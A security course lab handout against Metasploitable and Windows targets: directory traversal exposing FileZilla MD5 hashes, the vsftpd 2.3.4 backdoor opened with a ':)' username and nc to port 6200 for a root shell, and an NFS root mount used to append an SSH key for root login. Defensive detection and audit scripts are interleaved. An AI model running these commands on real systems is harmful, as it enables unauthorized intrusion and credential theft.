• Kali
• Metasploitable
• Win2008-124
On the Win2008-124 machine, open a new Command Prompt and execute the IPCONFIG
command. Find its IP address.
On some other computer, such as your host machine, open a Web browser and enter the IP
address of your Win2008-124 machine, followed by :3232
?../../../../
A directory appears, as shown below.
This is the root of C:, which contains objects like Boot, config.sys, and "Documents and Settings".
Next, open this path on the same server:
xampp/FileZillaFTP/FileZilla%20Server.xml
When you open that URL, a file downloads. The file is named "changelog.txt" but it actually
contains the FileZilla configuration file.
Open that file in a text editor. It contains passwords hashed with MD5, as shown below.
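The server on port 3232 hands out files from outside its web root because it never checks where a client-supplied path resolves. The following is an added example (not code from the page or from the server it describes) of the check a web server should make before opening a file: percent-decode the request until it is stable, treat backslashes as separators, reject NUL bytes, normalize the path under the web root, and refuse anything that lands outside it. The web root `/srv/www` and the sample requests are constructed for the example.

```python
import posixpath
from urllib.parse import unquote

# Assumed web root for this example; the page does not name the server's root.
WEB_ROOT = "/srv/www"


def decode_fully(value, max_rounds=3):
    """Percent-decode until stable, so double-encoded %252e%252e ("..") is seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def safe_join(root, user_path):
    """Resolve a client-supplied path under root; return None if it escapes."""
    decoded = decode_fully(user_path)
    if "\x00" in decoded:                 # NUL truncation tricks
        return None
    decoded = decoded.replace("\\", "/")  # Windows servers accept both separators
    root = posixpath.normpath(root)
    prefix = root if root.endswith("/") else root + "/"
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate == root or candidate.startswith(prefix):
        return candidate
    return None


def audit_requests(root, requested_paths):
    """Return the requests that would have escaped root (useful for log review)."""
    return [p for p in requested_paths if safe_join(root, p) is None]


# Constructed sample requests, modelled on the traversal the page describes.
SAMPLE_REQUESTS = [
    "index.html",
    "docs/../index.html",
    "../../../../boot.ini",
    "%2e%2e/%2e%2e/xampp/FileZillaFTP/FileZilla%20Server.xml",
    "..\\..\\Windows\\win.ini",
    "a%00.txt",
]

if __name__ == "__main__":
    for p in SAMPLE_REQUESTS:
        print(f"{p!r:62} -> {safe_join(WEB_ROOT, p)}")
```

The comparison is done on the normalized absolute path, not on the raw string, so `docs/../index.html` is still served while every form of `..` that leaves the root is refused.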
Capturing a Screen Image
Starting Metasploitable
Starting Kali
From your Kali machine, in a Terminal, execute this command, replacing the IP address with the
IP address of your Metasploitable machine.
nmap -A -p20-21 172.16.1.190
Nmap finds vsftpd 2.3.4, as shown below.
Understanding the Backdoor
Googling vsftpd 2.3.4 quickly shows articles explaining the backdoor, as shown below.
Installing FTP
apt-get update
apt install ftp -y
FTP installs, as shown below.
Connecting with FTP
On Kali, in a Terminal window, execute this command, replacing the IP address with the IP
address of your Metasploitable machine.
ftp 172.16.1.190
Enter a username of
aa:)
and type anything for the password.
Open a new Terminal window and execute this command, replacing the IP address with the IP
address of your Metasploitable machine.
nc 172.16.1.190 6200
There is no prompt, but you have a shell. To see that, execute these commands:
whoami
uname -a
You're root on metasploitable, as shown below.
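From the defender's side, the backdoor leaves two traces the page itself points at: a login attempt whose username contains the `:)` sequence, and an unexpected listener on TCP 6200. The following is an added example (not code from the page or from vsftpd) that flags both from host data, plus a banner check for the affected version. The log line shape `<date> [pid N] [user] OK|FAIL LOGIN: Client "addr"` is assumed to match vsftpd's own log, the `ss -ltn` column layout is assumed, and all sample lines are constructed.

```python
import re

# Assumed vsftpd.log line shape: '<date> [pid N] [user] OK|FAIL LOGIN: Client "addr"'.
LOGIN_RE = re.compile(
    r'^(?P<ts>.+?) \[pid (?P<pid>\d+)\] \[(?P<user>[^\]]*)\] '
    r'(?P<result>OK|FAIL) LOGIN: Client "(?P<client>[^"]+)"'
)
TRIGGER = ":)"        # the sequence the page says activates the backdoor
BACKDOOR_PORT = 6200  # the port the page connects to with nc

# Constructed sample log lines (not from the page or a real server).
SAMPLE_LOG = """\
Mon Jun  3 10:01:12 2019 [pid 2101] [msfadmin] OK LOGIN: Client "172.16.1.50"
Mon Jun  3 10:02:45 2019 [pid 2107] [aa:)] FAIL LOGIN: Client "172.16.1.100"
Mon Jun  3 10:02:46 2019 [pid 2110] [anonymous] OK LOGIN: Client "172.16.1.51"
Mon Jun  3 10:03:01 2019 [pid 2115] [user:)x] FAIL LOGIN: Client "172.16.1.100"
"""

# Constructed `ss -ltn` output (assumed column layout).
SAMPLE_SS = """\
State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port
LISTEN  0       32            0.0.0.0:21        0.0.0.0:*
LISTEN  0       128           0.0.0.0:22        0.0.0.0:*
LISTEN  0       1             0.0.0.0:6200      0.0.0.0:*
"""


def find_trigger_logins(log_text):
    """Return (client, username, result) for logins whose username carries the trigger."""
    hits = []
    for line in log_text.splitlines():
        m = LOGIN_RE.match(line)
        if m and TRIGGER in m.group("user"):
            hits.append((m.group("client"), m.group("user"), m.group("result")))
    return hits


def listening_ports(ss_output):
    """Parse `ss -ltn` style output; return the set of local TCP ports in LISTEN."""
    ports = set()
    for line in ss_output.splitlines():
        cols = line.split()
        if len(cols) < 4 or cols[0] != "LISTEN":
            continue
        port = cols[3].rsplit(":", 1)[-1]   # works for 0.0.0.0:6200 and [::]:6200
        if port.isdigit():
            ports.add(int(port))
    return ports


def unexpected_listeners(ss_output, expected_ports):
    """Ports listening that are not on the host's expected list, sorted."""
    return sorted(listening_ports(ss_output) - set(expected_ports))


def version_is_backdoored(service_line):
    """True when a banner or nmap service line reports vsftpd 2.3.4."""
    return re.search(r"vsftpd\s+2\.3\.4\b", service_line, re.IGNORECASE) is not None


if __name__ == "__main__":
    print("trigger logins:", find_trigger_logins(SAMPLE_LOG))
    print("unexpected listeners:", unexpected_listeners(SAMPLE_SS, {21, 22}))
    print("backdoored version:", version_is_backdoored("21/tcp open ftp vsftpd 2.3.4"))
```

Whether the triggering login ever reaches the log depends on the daemon build, so the listener check is the more reliable of the two signals; the version check is what removes the exposure in the first place.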
Capturing a Screen Image
From your Kali machine, in a Terminal, execute this command, replacing the IP address with the
IP address of your Metasploitable machine.
nmap -A 172.16.1.190
Nmap produces several screens of output.
Find the results for port 111. It detected nfs, as shown below.
Troubleshooting
Nmap 7.70 is broken and cannot run the nfs scan. Nmap 7.60 works. If your version can't
find the NFS share, just skip to the next section "Enumerating NFS".
Enumerating NFS
From your Kali machine, in a Terminal, execute these commands, replacing the IP address with
the IP address of your Metasploitable machine.
These commands install some software needed to use nfs shares, and mount the shared folder
on your Kali system in the /tmp folder.
apt-get update
apt-get install nfs-common -y
mkdir /tmp/mount
mount -t nfs 172.16.1.190:/ /tmp/mount -o nolock
cd /tmp/mount
ls
You see all the folders expected at the root of a Linux system, as shown below.
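What makes the mount above possible is an export of the whole filesystem to any client, with no credential check at all. The following is an added example (not code from the page or from the NFS utilities) of an `/etc/exports` audit that a defender can run on the server: it parses each export, then flags exports open to every host, world-writable exports, `no_root_squash`, and exports of sensitive paths. The sample file is constructed; its first line reproduces the situation the page shows.

```python
# Constructed /etc/exports sample (not the page's file). The first export is the
# configuration the page's mount command relies on: "/" exported to every host.
SAMPLE_EXPORTS = """\
# constructed sample
/            *(rw,sync,no_root_squash,no_subtree_check)
/srv/data    192.168.10.0/24(ro,sync,root_squash)
/home/shared 192.168.10.5(rw)
"""

SENSITIVE_PREFIXES = ("/home", "/root", "/etc")


def parse_exports(text):
    """Return [(path, [(host, [options...]), ...]), ...] for an exports file."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        path, specs = parts[0], parts[1:]
        clients = []
        for spec in specs:
            host, _, opts = spec.partition("(")
            options = [o for o in opts.rstrip(")").split(",") if o]
            clients.append((host or "*", options))   # "(rw)" alone means any host
        if not clients:
            clients.append(("*", []))                # no client list means any host
        exports.append((path, clients))
    return exports


def audit_exports(text):
    """Return (path, host, issue) findings, in file order."""
    findings = []
    for path, clients in parse_exports(text):
        for host, opts in clients:
            world = host == "*"
            if world:
                findings.append((path, host, "WORLD"))
            if world and "rw" in opts:
                findings.append((path, host, "WORLD_RW"))
            if "no_root_squash" in opts:
                # client root becomes root on the export, e.g. can write /root/.ssh
                findings.append((path, host, "NO_ROOT_SQUASH"))
            if path == "/" or path.startswith(SENSITIVE_PREFIXES):
                findings.append((path, host, "SENSITIVE_PATH"))
    return findings


if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_EXPORTS):
        print(*finding)
```

Fixing the first line means exporting only the directory that needs sharing, to named clients, with `root_squash` left at its default; the audit reports nothing for the `/srv/data` line for exactly that reason.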
From your Kali machine, in a Terminal, execute these commands to find the SSH keys for the
"msfadmin" user.
cd home
cd msfadmin
ls -al
cd .ssh
ls -l
Three files are found, as shown below.
• authorized_keys
• id_rsa
• id_rsa.pub
Let's look at these files.
ls
cat authorized_keys
The authorized_keys file contains public keys of authorized users, as shown below.
Generating SSH Keys
To exploit the Metasploitable box, we'll add our public SSH key to the authorized_keys file. So
first we need to generate keys.
ssh-keygen
The keys are generated and placed in the /root/.ssh directory, as shown below.
From your Kali machine, in a Terminal, execute this command, replacing the IP address with the
IP address of your Metasploitable machine.
ssh msfadmin@172.16.1.190
You get a shell as the "msfadmin" user, as shown below.
To get root access, all you need to do is add that public key to the root user's authorized_keys
file.
From your Kali machine, in a Terminal, execute these commands, replacing the IP address with
the IP address of your Metasploitable machine.
cd /tmp/mount/root/.ssh
cat /root/.ssh/id_rsa.pub >> ./authorized_keys
ssh root@172.16.1.190
whoami
You get a root shell, as shown below.
root@metasploitable:~# whoami
root
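The root compromise above comes down to one appended line in `/root/.ssh/authorized_keys`, so the matching detection is to check every key in that file (and in each user's file, as seen on the msfadmin account earlier) against a list of fingerprints the administrator actually issued. The following is an added example (not code from the page or from OpenSSH) of such an audit: it parses authorized_keys entries, including ones with an options prefix, computes the OpenSSH-style SHA256 fingerprint of each key blob, and reports any key not on the allowlist. The key blobs and the file contents are constructed placeholders, not real key material.

```python
import base64
import binascii
import hashlib
import shlex

KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")


def fingerprint(blob):
    """OpenSSH-style SHA256 fingerprint of a raw (base64-decoded) public key blob."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text):
    """Return (line_no, key_type, blob_bytes, comment) for each key line."""
    entries = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = shlex.split(line)   # keeps quoted option values such as command="..." intact
        idx = next((i for i, t in enumerate(tokens) if t in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(tokens):
            continue                  # malformed line; a real tool would report it
        try:
            blob = base64.b64decode(tokens[idx + 1], validate=True)
        except binascii.Error:
            continue
        comment = " ".join(tokens[idx + 2:])
        entries.append((n, tokens[idx], blob, comment))
    return entries


def audit_authorized_keys(text, allowed_fingerprints):
    """Return (line_no, fingerprint, comment) for every key not on the allowlist."""
    return [(n, fingerprint(blob), comment)
            for n, _ktype, blob, comment in parse_authorized_keys(text)
            if fingerprint(blob) not in allowed_fingerprints]


# Constructed keys: the blobs are placeholder bytes, not real key material.
KNOWN_BLOB = base64.b64encode(b"constructed msfadmin key").decode()
ROGUE_BLOB = base64.b64encode(b"constructed attacker key").decode()

# Constructed authorized_keys content; the last line plays the appended key.
SAMPLE_AUTHORIZED_KEYS = f"""\
# constructed sample /root/.ssh/authorized_keys
ssh-rsa {KNOWN_BLOB} msfadmin@metasploitable
no-pty,command="/usr/local/bin/backup" ssh-ed25519 {KNOWN_BLOB} backup@metasploitable
ssh-rsa {ROGUE_BLOB} root@kali
"""

# Fingerprints the administrator issued (constructed allowlist).
ALLOWED_FINGERPRINTS = {fingerprint(base64.b64decode(KNOWN_BLOB))}

if __name__ == "__main__":
    for line_no, fp, comment in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, ALLOWED_FINGERPRINTS):
        print(f"line {line_no}: unexpected key {fp} ({comment})")
```

Matching on the fingerprint rather than on the comment matters: the comment is free text the writer of the line chooses, while the fingerprint is derived from the key bytes themselves.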
Capture a whole-desktop image and save it as "Proj 11c from YOURNAME".